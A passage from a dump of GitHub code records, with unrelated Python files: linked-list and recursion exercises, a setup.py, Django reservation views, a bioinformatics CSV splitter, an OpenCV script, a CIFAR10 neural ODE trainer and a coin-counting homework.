data):\n if self.head == None:\n node = Node(None,data,self.head)\n self.head = node\n else:\n node = Node(None,data, self.head)\n self.head = node\n self.head.prev = node\n\n def insertEnd(self, data):\n if self.head is None:\n self.insertBeginning(data)\n return\n itr = self.head\n while 
itr.next:\n itr = itr.next\n node = Node(data, None)\n itr.next = node\n\n def NewList(self, newlist):\n i = len(newlist) - 1\n while i >= 0:\n self.insertBeginning(newlist[i])\n i -= 1\n\n def listlength(self):\n counter = 1\n itr = self.head\n while itr.next:\n counter += 1\n itr = itr.next\n return counter\n\n\n\n\n def printllforward(self):\n if self.head == None:\n return\n\n itr = self.head\n\n while itr:\n print(itr.data)\n itr = itr.next\n\n def getLastnode(self):\n itr = self.head\n\n while itr.next:\n itr = itr.next\n return itr\n\n\n\n def printllbackward(self):\n if self.head == None:\n return\n\n itr = self.getLastnode()\n\n while itr:\n print(itr.data)\n itr = itr.prev\n\n\ndoublelist = DoublyLL()\ndoublelist.insertBeginning(9)\ndoublelist.insertBeginning(8)\ndoublelist.insertBeginning(6)\ndoublelist.printllforward()\ndoublelist.printllbackward()\n\n\n\n\n\n\n\n\n","repo_name":"goshipra/Algoritms","sub_path":"leetcodesolutions/doublylinkedlist.py","file_name":"doublylinkedlist.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"773702364","text":"res = input(\"Enter your list: \").split()\r\nit = 0\r\n\r\n\r\ndef convert_list(ress, iterator):\r\n \"\"\"\r\n This function is converting all elements of list into float type\r\n\r\n Args:\r\n ress: list, that is converting\r\n iterator: integer, iterator, that points on element in list\r\n\r\n Returns:\r\n ress: converted list\r\n\r\n Raises:\r\n OverflowError\r\n ValueError\r\n\r\n Examples:\r\n print(convert_list([\"1\", \"2\", \"3\"], 0))\r\n [1, 2, 3]\r\n print(convert_list([\"a\", \"2\", \"3\"], 0))\r\n Traceback (most recent call last):\r\n ...\r\n ValueError\r\n \"\"\"\r\n if iterator < len(ress):\r\n ress[iterator] = float(ress[iterator])\r\n return convert_list(ress, iterator + 1)\r\n return ress\r\n\r\n\r\nres1 = convert_list(res, it)\r\nmax_el = res1[it]\r\n\r\n\r\ndef max_f(inp_list, iterator):\r\n \"\"\"\r\n This function is calculating max element\r\n\r\n Args:\r\n inp_list: list, where max is searching\r\n iterator: integer, iterator, that points on element in list\r\n\r\n Returns:\r\n max_el: integer\r\n\r\n Raises:\r\n OverflowError\r\n ValueError\r\n\r\n Examples:\r\n print(max_f([1,2,3,4],0))\r\n \"4\"\r\n print(max_f([1,2,\"a\",3],0))\r\n Traceback (most recent call last):\r\n ...\r\n ValueError\r\n \"\"\"\r\n global max_el\r\n if iterator < len(inp_list)-1:\r\n if max_el < inp_list[iterator+1]:\r\n max_el = inp_list[iterator + 1]\r\n return max_f(inp_list, iterator + 1)\r\n else:\r\n return max_f(inp_list, iterator + 1)\r\n return max_el\r\n\r\n\r\nmax_elem = max_f(res1, it)\r\ntest = []\r\n\r\n\r\ndef del_max_el(resa, max_element, iterator):\r\n \"\"\"\r\n This function is deleting all elements, which values are equal to the value of max element\r\n\r\n Args:\r\n resa: list, where second max is searching\r\n iterator: integer, iterator, that points on element in list\r\n max_element: first max_element\r\n\r\n Returns:\r\n test: list, list without first max element\r\n\r\n Raises:\r\n OverflowError\r\n ValueError\r\n\r\n Examples:\r\n print(del_max_el([1, 2, 3, 4], 4, 0))\r\n [1, 2, 3]\r\n print(del_max_el([1, \"a\", 3, 4], 4, 0))\r\n Traceback (most recent call last):\r\n ...\r\n ValueError\r\n \"\"\"\r\n global test\r\n if iterator < len(resa) - 1:\r\n if resa[iterator] != max_element:\r\n test.append(resa[iterator])\r\n return del_max_el(resa, max_element, iterator + 1)\r\n else:\r\n return 
del_max_el(resa, max_element, iterator + 1)\r\n elif iterator == len(resa)-1:\r\n if resa[iterator] != max_element:\r\n test.append(resa[iterator])\r\n return test\r\n\r\n\r\ndel_max_el(res1, max_elem, it)\r\nit = 0\r\n\r\n\r\n\r\n\r\ndef sec_max_f(inp_list, iterator):\r\n \"\"\"\r\n This function is calculating second max element element\r\n\r\n Args:\r\n inp_list: list, where second max is searching\r\n iterator: integer, iterator, that points on element in list\r\n\r\n Returns:\r\n sec_max_el: integer\r\n\r\n Raises:\r\n OverflowError\r\n ValueError\r\n\r\n Examples:\r\n print(sec_max_f([1, 2, 3], 0))\r\n \"3\"\r\n print(sec_max_f([1, 2, \"b\"], 0))\r\n Traceback (most recent call last):\r\n ...\r\n ValueError\r\n \"\"\"\r\n global sec_max_el\r\n if iterator < len(inp_list) - 1:\r\n if sec_max_el < inp_list[iterator+1]:\r\n sec_max_el = inp_list[iterator + 1]\r\n return sec_max_f(inp_list, iterator + 1)\r\n else:\r\n return sec_max_f(inp_list, iterator + 1)\r\n return sec_max_el\r\n\r\nif len(test) > 0:\r\n sec_max_el = test[it]\r\n print(\"Second max element is:\", sec_max_f(test, it))\r\nelse:\r\n print(\"The list does not have second max element.\")\r\n\r\n","repo_name":"SergeyBondarenko/amis_python71","sub_path":"km71/Bondarenko_Sergii/12/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":3812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"21287588636","text":"import setuptools\n\nwith open('Readme.md', 'r') as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"arpys\",\n version=\"0.0.1\",\n author=\"Kyle Gordon\",\n author_email=\"kgord831@gmail.com\",\n description=\"ARPES analysis with python and xarray\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)\n","repo_name":"kgord831/arpys","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70698429044","text":"from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponse, Http404\nfrom django.shortcuts import redirect, render\nfrom django.template import loader\nfrom django.views.generic import ListView\nfrom rest_framework import viewsets\nfrom rest_framework.response import Response\n\nfrom reservations.decorators import user_passes_test\nfrom reservations.forms import AdminReservationForm\nfrom reservations.models import Person\nfrom reservations.models import Reservation\nfrom reservations.models import ReservationStatus\nfrom reservations.permissions import ReservationPermission\nfrom reservations.serializers import *\nfrom reservations.services import ReservationService\nfrom reservations.settings import DEFAULT_PAGE_SIZE\n\n\nclass AdminReservationViewSet(viewsets.ModelViewSet):\n queryset = Reservation.objects.all()\n serializer_class = ReservationSerializer\n http_method_names = [\n \"get\",\n \"post\",\n \"patch\",\n \"delete\",\n \"put\",\n \"head\",\n \"options\",\n \"trace\",\n ]\n permission_classes = [ReservationPermission]\n\n def get_queryset(self):\n if self.request.user.is_superuser:\n return Reservation.objects.all()\n return 
ReservationService.find_managed_reservations(self.request.user)\n\n def destroy(self, request, *args, **kwargs):\n ReservationService.delete(self.get_object().id)\n return Response(data=\"delete success\")\n\n def create(self, request, *args, **kwargs):\n author = Person.objects.get(user=request.user)\n reservation_status = ReservationStatus.objects.create(\n author=author, note=request.data[\"note\"] if \"note\" in request.data else \"Reservation\"\n )\n request.data[\"author\"] = author.id\n reservation_data = super().create(request, *args, **kwargs).data\n reservation_data[\"reservation_status\"] = [reservation_status.id]\n reservation = Reservation.objects.get(dt_created=reservation_data[\"dt_created\"])\n reservation.reservation_status.add(reservation_status)\n reservation.save()\n return Response(reservation_data)\n\n def update(self, request, *args, **kwargs):\n author = Person.objects.get(user=request.user)\n reservation_status = ReservationStatus.objects.create(\n author=author, note=request.data[\"note\"] if \"note\" in request.data else \"Reservation\"\n )\n request.data[\"author\"] = author.id\n reservation_data = super().update(request, *args, **kwargs).data\n reservation = self.get_object()\n reservation.reservation_status.add(reservation_status)\n reservation.save()\n\n reservation_data[\"reservation_status\"] = [status.id for status in reservation.reservation_status.all()]\n return Response(reservation_data)\n\n def partial_update(self, request, *args, **kwargs):\n if \"attendees\" not in request.data:\n return Response(data=\"Attendees to change not specified\", status=400)\n kwargs[\"partial\"] = True\n request._full_data = {\"attendees\": request.data[\"attendees\"]}\n return self.update(request, *args, **kwargs)\n\n def get_serializer_context(self):\n return {\"request\": self.request}\n\n\nclass AdminReservationTemplateView(ListView):\n @staticmethod\n @user_passes_test(\n lambda u: u.is_superuser\n or u.has_perm(\"reservations.is_room_manager\")\n or u.has_perm(\"reservations.is_group_manager\")\n )\n def reservation_get_view(request, reservation_id):\n reservation = ReservationService.find_by_id(reservation_id)\n template = loader.get_template(\"administrator/reservations/detail.html\")\n return HttpResponse(template.render({\"reservation\": reservation}, request))\n\n @staticmethod\n @user_passes_test(\n lambda u: u.is_superuser\n or u.has_perm(\"reservations.is_room_manager\")\n or u.has_perm(\"reservations.is_group_manager\")\n )\n def reservations_get_view(request):\n page = request.GET.get(\"page\", 1)\n\n if request.user.is_superuser:\n paginator = Paginator(ReservationService.find_all(), DEFAULT_PAGE_SIZE)\n else:\n paginator = Paginator(ReservationService.find_managed_reservations(request.user), DEFAULT_PAGE_SIZE)\n\n try:\n reservations = paginator.page(page)\n except PageNotAnInteger:\n reservations = paginator.page(1)\n except EmptyPage:\n reservations = paginator.page(paginator.num_pages)\n\n return render(request, \"administrator/reservations/list.html\", {\"reservations\": reservations})\n\n @staticmethod\n @user_passes_test(lambda u: u.is_superuser)\n def reservation_delete_view(request, reservation_id):\n template = loader.get_template(\"administrator/reservations/list.html\")\n if not ReservationService.delete(reservation_id):\n return HttpResponse(template.render({\"errors\": [\"Failed to delete reservation\"]}, request))\n return redirect(\"/administrator/reservations/\")\n\n @staticmethod\n @user_passes_test(\n lambda u: u.is_superuser\n or 
u.has_perm(\"reservations.is_room_manager\")\n or u.has_perm(\"reservations.is_group_manager\")\n )\n def reservation_create_view(request):\n form = AdminReservationForm(request, request.POST or None)\n template = loader.get_template(\"administrator/reservations/create.html\")\n\n if form.is_valid():\n if not ReservationService.save(form.cleaned_data, request.user):\n return HttpResponse(template.render({\"errors\": [\"Something went wrong\"], \"form\": form}, request))\n return redirect(\"/administrator/reservations/\")\n return HttpResponse(template.render({\"form\": form}, request))\n\n @staticmethod\n @user_passes_test(lambda u: u.is_superuser)\n def reservation_edit_view(request, reservation_id):\n instance = ReservationService.find_by_id(reservation_id)\n template = loader.get_template(\"administrator/reservations/update.html\")\n\n if instance is None:\n raise Http404(\"Reservation does not exist\")\n form = AdminReservationForm(request, request.POST or None, instance=instance)\n\n if form.is_valid():\n if not ReservationService.update(instance, form.cleaned_data, request.user):\n return HttpResponse(template.render({\"errors\": [\"Something went wrong\"], \"form\": form}, request))\n return redirect(\"/administrator/reservations/\")\n return HttpResponse(template.render({\"form\": form, \"reservation\": instance}, request))\n","repo_name":"tomas-dostal/fit-reservations","sub_path":"src/reservations/views/administrator/reservation.py","file_name":"reservation.py","file_ext":"py","file_size_in_byte":6610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34706287870","text":"__author__= 'Pedro J. Torres'\nimport argparse\nimport os\nimport pandas,numpy\n\n\"\"\"Script allows you to take in an output file from qiime2 barplots and split each sample into its own file with the raw counts in one row and the percent abundance in another.\"\"\"\n\n#-----------Command Line Arguments-----------------\nparser=argparse.ArgumentParser(description=\"This script uses numpy and pandas. Make sure both are installed. Script will make an individual file for each sample from a qiime2 barplot otput and give their raw counts and percent abudnances. - Pedro J. Torres\")\nparser.add_argument('-i','--input', help=' Input csv file you want to split',required=True)\nargs = parser.parse_args()\ncsvfile=str(args.input) \n\n#---------Rearrange Taxa category to make it easier to parse-----\nprint ('split script has started ...')\nfin=open(csvfile, 'rU')\nfout=open('temp1.csv','w+')\nheader=fin.readline()\nfout.write('Taxa'+','+header[48:]) # the file given to me had tab delimeted headers for the k,p,c,o,f,g,s so this can be changed to suit your needs. If any issues I can help\n\n#This will re organize the file to make it easier to transform our data sicne K,P,C,O ECT.. 
are tab delimeted\nfor line in fin:\n line= line.split(',')\n taxa=line[:6]\n taxa=(\";\".join(taxa))#taxa is now ';' seperated\n taxa=taxa.strip('\\n')\n taxabundance=line[6:]# this is all our taxa abundance\n taxabundance=(\",\".join(taxabundance))\n newline=taxa+'\\t'+taxabundance\n fout.write(newline)\nfout.close()\nfin.close()\n\n#------------Temp file will be transformed in pandas to split easier-----\ndf=pandas.read_csv('temp1.csv')\ndft=(df.set_index('Taxa').T)\ndft.to_csv('temp.csv')\nos.remove(\"temp1.csv\")# remove old temp file from before\n\n#-------------- Split columns into different Temp files based on sample ------\nfin2=open('temp.csv', 'rU')\nfout2=open('tmp2.csv', 'w+')\nheader=fin2.readline()\nheader= header.strip(',').replace('\\t','_').replace(\" \",\"_\")\nheads=\"SampleID\"+','+header\nheads=heads.split(',')\nheads= '\\t'.join(heads)\nfor line in fin2:\n linesplit= line.split(',')\n filename = linesplit[0]# nme of file\n fout2=open(filename+\".tmp.csv\",'w+')\n rowinfo =\"\\t\".join(linesplit)\n fout2.write(heads)\n fout2.write(rowinfo)\nfin2.close()\nfout2.close()\n\n#---------------- Make Final file with Taxa, raw counts, and percetn abundance\nos.remove('temp.csv')\nos.remove('tmp2.csv')\nF=[i for i in os.listdir('.') if i.split('.')[-2]=='tmp']\ncount=0\nfor f in F:\n count += 1\n try:\n colname=f.split('.')[0]\n newfile= f.split('.')[0]+'_percent.csv'\n df=pandas.read_table(f, sep='\\t')\n dft=(df.set_index('SampleID').T)\n dft = dft.sort_values(colname, ascending=False)\n dft['Percent']= (dft[colname]/dft[colname].sum())*100\n dft.to_csv(newfile)\n os.remove(f)\n except pandas.io.common.EmptyDataError:\n print (f, \" is empty\")\n\nprint ('Done :)')\nprint (\"There are \" + str(count)+ \" samples\")\n","repo_name":"pjtorres/16S_amplicon_preprocessing_code","sub_path":"percent_taxa_per_sample_split.py","file_name":"percent_taxa_per_sample_split.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"41115021729","text":"import cv2\ncap=cv2.VideoCapture(1)\nret=cap.set(3,5000)\nret=cap.set(4,5000)\nret=cap.set(15,-1)\n#cap.set(10,230)#亮度,最高250\n#cap.set(11,200)#对比度,最高250\n\n\nn=0\ntime=10\n\ndict={}\n\nwhile 1:\n #print (cap.get(3))\n #print (cap.get(4))\n #print (cap.get(14))\n #print (cap.get(15))\n _,frame=cap.read()\n #d=d+frame\n cv2.imshow('1',frame)\n #cv2.imshow('d',d)\n cv2.waitKey(1)\n dict[n]=frame\n \n f=0\n y=time\n if n>y:\n del dict[n-y-1]\n #print ('n is ',n)\n while y>=1:\n #print ('y is ',y)\n y=y-1\n f=cv2.add(f,dict[n-y])\n \n \n cv2.imshow('f',f)\n \n #e=dict[n]+dict[n-1]+dict[n-2]+dict[n-3]+dict[n-4]+dict[n-5]\n \n \n \n n=n+1\n \n","repo_name":"wjb711/Python_learn","sub_path":"微光夜视2.py","file_name":"微光夜视2.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"36391890218","text":"\"\"\"Command line interface to animate Hyades\n\nNote:\n Save feature requires ffmpeg installed.\n Oct 6, 2021 All three animations and the save feature work on the lab iMac\n quiet broke things somehow\n\n\"\"\"\nimport os\nimport argparse\nimport matplotlib.pyplot as plt\nfrom graphics.animated_eulerian import eulerian_animation\nfrom graphics.animated_histograms import histogram_animation\nfrom graphics.animated_lineout import lineout_animation\n\n\ndescription = '''A command line interface to make simple animations of Hyades runs.\n\nOptions to animate the 
Eulerian position of the run, distributions\nof a variable (with inset lineout), or the lineout of any variable\non its own.\n\nUsing --save requires ffmpeg. Currently, there is no alternative.\n\nExamples:\n If you already ran the simulation diamond_decay, the following\n line would animate the distribution of pressures in the sample\n $ python animate.py diamond_decay -l Pres\n \n The following line would make an Eulerian space animation, and\n color the animation using the Particle Velocity at each point.\n The extensions --save and --quiet are combined into -sq so the\n graphics would be saved and would not be displayed.\n $ python animate.py diamond_decay -e U -sq\n'''\nepilog = '''\n ___ _ _ \n | _ \\_ _| || |_ _ \n | _/ || | __ | || |\n |_| \\_, |_||_|\\_, |\n |__/ |__/ \n Developed by the Wicks Lab at JHU\n'''\n\nparser = argparse.ArgumentParser(prog='animate.py',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=description,\n epilog=epilog\n )\n\nparser.add_argument('filename', type=str,\n help='Name of the Hyades run to be plotted. Does not require file extension.')\nparser.add_argument('-e', '--eulerian',\n help='Animate the sample moving through Eulerian space. Colors the sample with a variable.')\nparser.add_argument('-g', '--histogram',\n help='Animate the distribution of a variable over time.')\nparser.add_argument('-l', '--lineout',\n help='Animate a lineout of a variable over time.')\nparser.add_argument('-c', '--coordinate', choices=('e', 'eulerian', 'l', 'lagrangian'),\n help='Coordinate system to use on the x-axis of XT Diagrams and Lineouts. (Default: Lagrangian)'\n '\\nOnly applies to --lineout.')\n\nparser.add_argument('-s', '--save', nargs='?', const=12,\n help='* Requires ffmpeg installed * '\n 'Saves all graphics at specified frames per second (default: 12 fps). '\n 'Saving long animations may take a couple minutes.')\nparser.add_argument('-q', '--quiet', action='store_true',\n help='Toggle to hide the graphics.'\n ' Recommend use with --save for saving files without viewing.')\n\nargs = parser.parse_args()\n# End parser\n\nabs_path = os.path.join('./data/', os.path.splitext(args.filename)[0])\nbase_save_filename = os.path.join('./data', os.path.splitext(args.filename)[0], os.path.splitext(args.filename)[0])\ncoordinate_system = args.coordinate or 'Lagrangian'\nif coordinate_system == 'e':\n coordinate_system = 'Eulerian'\nelif coordinate_system == 'l':\n coordinate_system = 'Lagrangian'\n\nif args.eulerian:\n animation = eulerian_animation(abs_path, args.eulerian)\n if args.save:\n save_filename = f'{base_save_filename} {args.eulerian} eulerian.mp4'\n print(f'Saving {save_filename}...')\n animation.save(save_filename, fps=args.save)\n print('Saved.')\n\nif args.histogram:\n animation = histogram_animation(abs_path, args.histogram)\n if args.save:\n save_filename = f'{base_save_filename} {args.histogram} histogram.mp4'\n print(f'Saving {save_filename}...')\n animation.save(save_filename, fps=args.save)\n print('Saved.')\n\nif args.lineout:\n animation = lineout_animation(abs_path, args.lineout, coordinate_system=coordinate_system)\n if args.save:\n save_filename = f'{base_save_filename} {args.lineout} lineout.mp4'\n print(f'Saving {save_filename}...')\n animation.save(save_filename, fps=args.save)\n print('Saved.')\n\nif not args.quiet:\n plt.show()\n\nif args.quiet and (not args.save):\n print('Selection did not display or save the graphics. 
See --help for more info.')\n\n# Below is the best line of Python I've ever written\nis_only_filename = not any([getattr(args, arg) for arg in vars(args) if not arg == 'filename'])\nif is_only_filename:\n print('Whoops! No graphics were specified.'\n 'Try adding one of the options to plot a figure. See --help for more info.')\n","repo_name":"WicksGroup/pyhy","sub_path":"animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":4890,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"36827422698","text":"\"\"\"\nTrain a Vanilia NODE on CIFAR10 dataset.\npython3 cifar10_vaniliaNODE.py --net_layer_num 16 --conv_channel_num 128 --h 0.1 --lr 1e-3 --weight_decay 1e-3 --max_epochs 3 --scheduler_milestones=[1, 2, 3] --scheduler_gamma=0.1\n\"\"\"\n\n\"\"\"\nthis script implements the CIFAR10 classification task using the NODE+Euler discretization method\nby using the following tricks, we can show that the contraction regularization improves the robustness to Guasssian noise\n- proper weight initializaton\n- smooth leaky relu with slop 0.1\n- porper optimization parameters\n\"\"\"\n\n\n\n\nfrom pl_bolts.transforms.dataset_normalizations import cifar10_normalization\nfrom pl_bolts.datamodules import CIFAR10DataModule\nimport torchvision\nfrom torch.optim.lr_scheduler import MultiStepLR\nimport argparse\nimport matplotlib.pyplot as plt\nfrom tomlkit import comment\nfrom pytorch_lightning import LightningModule\nfrom torchvision import datasets, transforms\nimport pytorch_lightning as pl\nfrom torchmetrics import Accuracy\nfrom torch.nn import functional as F\nimport torchvision.transforms as T\nimport torch\nfrom torch import nn\nfrom pytorch_lightning.loggers import TensorBoardLogger\nclass Net(nn.Module):\n def __init__(self, net_layer_num, conv_channel_num, h):\n super().__init__()\n self.net_layer_num = net_layer_num\n self.conv_channel_num = conv_channel_num\n\n # output of self.conv0 self.conv_channel_num*32*32\n self.conv0 = nn.Conv2d(3, self.conv_channel_num, 3, 1, 1)\n self.bn = nn.BatchNorm2d(self.conv_channel_num)\n self.dropout1 = nn.Dropout(0.1)\n self.dropout2 = nn.Dropout(0.2)\n self.conv = nn.ModuleList([nn.Conv2d(self.conv_channel_num,\n self.conv_channel_num, 3, 1, 1) for i in range(self.net_layer_num)]) # output of self.conv[i] is self.conv_channel_num*32*32\n\n self.fc1 = nn.Linear(self.conv_channel_num*32*32, 10)\n self.h = h\n\n def smooth_leaky_relu(self, x):\n alpha = 0.1\n return alpha*x+(1 - alpha) * torch.log(1+torch.exp(x))\n\n def forward(self, x):\n x = self.conv0(x)\n x = self.bn(x)\n x = self.dropout1(x)\n for i in range(self.net_layer_num):\n x = x+self.h*self.smooth_leaky_relu(self.conv[i](x))\n\n x = torch.flatten(x, 1)\n x = self.dropout2(x)\n logits = self.fc1(x)\n return logits\n\n\nclass CIFAR10Classifier(LightningModule):\n def __init__(self, net_layer_num, conv_channel_num, h, lr, weight_decay, scheduler_milestones, scheduler_gamma):\n super().__init__()\n self.net_layer_num = net_layer_num\n self.conv_channel_num = conv_channel_num\n self.h = h\n self.lr = lr\n self.weight_decay = weight_decay\n self.scheduler_milestones = scheduler_milestones\n self.scheduler_gamma = scheduler_gamma\n self.neural_net = Net(net_layer_num, conv_channel_num, h)\n self.acc = Accuracy()\n\n def forward(self, x):\n return self.neural_net(x)\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n logits = self.forward(x)\n train_loss = F.cross_entropy(logits, y.long())\n self.log(\"train_loss\", 
train_loss)\n self.log(\"optimizer_lr\", self.optimizer.param_groups[0][\"lr\"])\n return train_loss\n\n def test_step(self, batch, batch_idx):\n x, y = batch\n logits = self.forward(x)\n loss = F.cross_entropy(logits, y.long())\n self.acc(logits, y)\n self.log(\"test_acc\", self.acc)\n self.log(\"test_loss\", loss)\n self.log(\"hp_metric\", self.acc)\n\n def configure_optimizers(self):\n self.optimizer = torch.optim.SGD(\n self.neural_net.parameters(),\n lr=self.lr,\n momentum=0.9,\n weight_decay=self.weight_decay\n )\n self.scheduler = MultiStepLR(\n self.optimizer, milestones=self.scheduler_milestones, gamma=self.scheduler_gamma)\n return [self.optimizer], [self.scheduler]\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--net_layer_num', type=int, default=16)\n parser.add_argument('--conv_channel_num', type=int, default=128)\n parser.add_argument('--h', type=float, default=0.1)\n parser.add_argument('--max_epochs', type=int, default=100)\n parser.add_argument('--lr', type=float, default=5e-2)\n parser.add_argument('--weight_decay', type=float, default=1e-2)\n parser.add_argument('--scheduler_milestones',\n type=int, nargs='+', default=[50, 70, 80])\n parser.add_argument('--scheduler_gamma', type=float, default=0.1)\n args = parser.parse_args()\n\n # define NODE\n logger = TensorBoardLogger(\n \"tb_logs\", name=\"cifar10_vaniliaNODE\")\n logger.log_hyperparams({\"net_layer_num\": args.net_layer_num, \"conv_channel_num\": args.conv_channel_num,\n \"h\": args.h, \"max_epochs\": args.max_epochs, \"lr\": args.lr, \"weight_decay\": args.weight_decay, \"scheduler_milestones\": args.scheduler_milestones, \"scheduler_gamma\": args.scheduler_gamma})\n\n NODE = CIFAR10Classifier(net_layer_num=args.net_layer_num, conv_channel_num=args.conv_channel_num, h=args.h,\n lr=args.lr, weight_decay=args.weight_decay, scheduler_milestones=args.scheduler_milestones, scheduler_gamma=args.scheduler_gamma)\n logger.log_graph(NODE)\n\n trainer = pl.Trainer(gpus=[1, 2, 3], num_nodes=1,\n callbacks=[], max_epochs=args.max_epochs, logger=logger, gradient_clip_val=0.5)\n\n # generate data set\n # the transform follows the example here: https://pytorch-lightning.readthedocs.io/en/stable/notebooks/lightning_examples/cifar10-baseline.html\n train_transforms = torchvision.transforms.Compose(\n [\n torchvision.transforms.RandomCrop(32, padding=4),\n torchvision.transforms.RandomHorizontalFlip(),\n torchvision.transforms.ToTensor(),\n cifar10_normalization(),\n ]\n )\n train_dataloader = torch.utils.data.DataLoader(datasets.CIFAR10('data', train=True, download=True,\n transform=train_transforms), batch_size=128, shuffle=True)\n\n test_transforms = torchvision.transforms.Compose(\n [\n torchvision.transforms.ToTensor(),\n cifar10_normalization(),\n ]\n )\n\n test_dataloader = torch.utils.data.DataLoader(datasets.CIFAR10(\n 'data', train=False, transform=test_transforms), batch_size=128, shuffle=True)\n\n # train neural networks\n\n trainer.fit(NODE, train_dataloader)\n\n # test performance\n train_accuracy = trainer.test(NODE, train_dataloader)\n logger.log_metrics({\"train_accuracy\": train_accuracy[0][\"test_acc\"]})\n logger.log_metrics({\"train_loss\": train_accuracy[0][\"test_loss\"]})\n test_accuracy = trainer.test(NODE, test_dataloader)\n logger.log_metrics({\"test_accuracy\": test_accuracy[0][\"test_acc\"]})\n logger.log_metrics({\"test_loss\": 
test_accuracy[0][\"test_loss\"]})\n","repo_name":"lxutn/PDS2_hamiltonians","sub_path":"HDNN/cifar10_vaniliaNODE.py","file_name":"cifar10_vaniliaNODE.py","file_ext":"py","file_size_in_byte":7050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"17840254072","text":"HW_SOURCE_FILE = __file__\n\n\ndef num_eights(n):\n \"\"\"Returns the number of times 8 appears as a digit of n.\n\n >>> num_eights(3)\n 0\n >>> num_eights(8)\n 1\n >>> num_eights(88888888)\n 8\n >>> num_eights(2638)\n 1\n >>> num_eights(86380)\n 2\n >>> num_eights(12345)\n 0\n >>> num_eights(8782089)\n 3\n >>> from construct_check import check\n >>> # ban all assignment statements\n >>> check(HW_SOURCE_FILE, 'num_eights',\n ... ['Assign', 'AnnAssign', 'AugAssign', 'NamedExpr', 'For', 'While'])\n True\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n if n == 8:\n return 1\n elif n < 10:\n return 0\n else:\n return num_eights(n // 10)+num_eights(n % 10)\n\n\ndef pingpong(n):\n \"\"\"Return the nth element of the ping-pong sequence.\n\n >>> pingpong(8)\n 8\n >>> pingpong(10)\n 6\n >>> pingpong(15)\n 1\n >>> pingpong(21)\n -1\n >>> pingpong(22)\n -2\n >>> pingpong(30)\n -2\n >>> pingpong(68)\n 0\n >>> pingpong(69)\n -1\n >>> pingpong(80)\n 0\n >>> pingpong(81)\n 1\n >>> pingpong(82)\n 0\n >>> pingpong(100)\n -6\n >>> from construct_check import check\n >>> # ban assignment statements\n >>> check(HW_SOURCE_FILE, 'pingpong',\n ... ['Assign', 'AnnAssign', 'AugAssign', 'NamedExpr'])\n True\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n def direction(x):\n if x == 1:\n return 1\n elif num_eights(x) > 0 or x % 8 == 0:\n return -1*direction(x-1)\n else:\n return direction(x-1)\n if n == 1:\n return 1\n else:\n return pingpong(n-1)+direction(n-1)\n\n\ndef next_larger_coin(coin):\n \"\"\"Returns the next larger coin in order.\n >>> next_larger_coin(1)\n 5\n >>> next_larger_coin(5)\n 10\n >>> next_larger_coin(10)\n 25\n >>> next_larger_coin(2) # Other values return None\n \"\"\"\n if coin == 1:\n return 5\n elif coin == 5:\n return 10\n elif coin == 10:\n return 25\n\n\ndef next_smaller_coin(coin):\n \"\"\"Returns the next smaller coin in order.\n >>> next_smaller_coin(25)\n 10\n >>> next_smaller_coin(10)\n 5\n >>> next_smaller_coin(5)\n 1\n >>> next_smaller_coin(2) # Other values return None\n \"\"\"\n if coin == 25:\n return 10\n elif coin == 10:\n return 5\n elif coin == 5:\n return 1\n\n\ndef count_coins(change):\n \"\"\"Return the number of ways to make change using coins of value of 1, 5, 10, 25.\n >>> count_coins(15)\n 6\n >>> count_coins(10)\n 4\n >>> count_coins(20)\n 9\n >>> count_coins(100) # How many ways to make change for a dollar?\n 242\n >>> count_coins(200)\n 1463\n >>> from construct_check import check\n >>> # ban iteration\n >>> check(HW_SOURCE_FILE, 'count_coins', ['While', 'For'])\n True\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n def count_partitions(n, biggest_coin):\n if n == 0:\n return 1\n elif n < 0:\n return 0\n elif biggest_coin == None:\n return 0\n else:\n with_biggest = count_partitions(n-biggest_coin, biggest_coin)\n without_biggest = count_partitions(n, next_smaller_coin(biggest_coin))\n return with_biggest+without_biggest\n \n if change >= 25:\n biggest_coin = 25\n elif change >= 10:\n biggest_coin = 10\n elif change >= 5:\n biggest_coin = 5\n elif change >= 1:\n biggest_coin = 1\n else:\n biggest_coin = None\n return count_partitions(change-biggest_coin, biggest_coin)+count_partitions(change, 
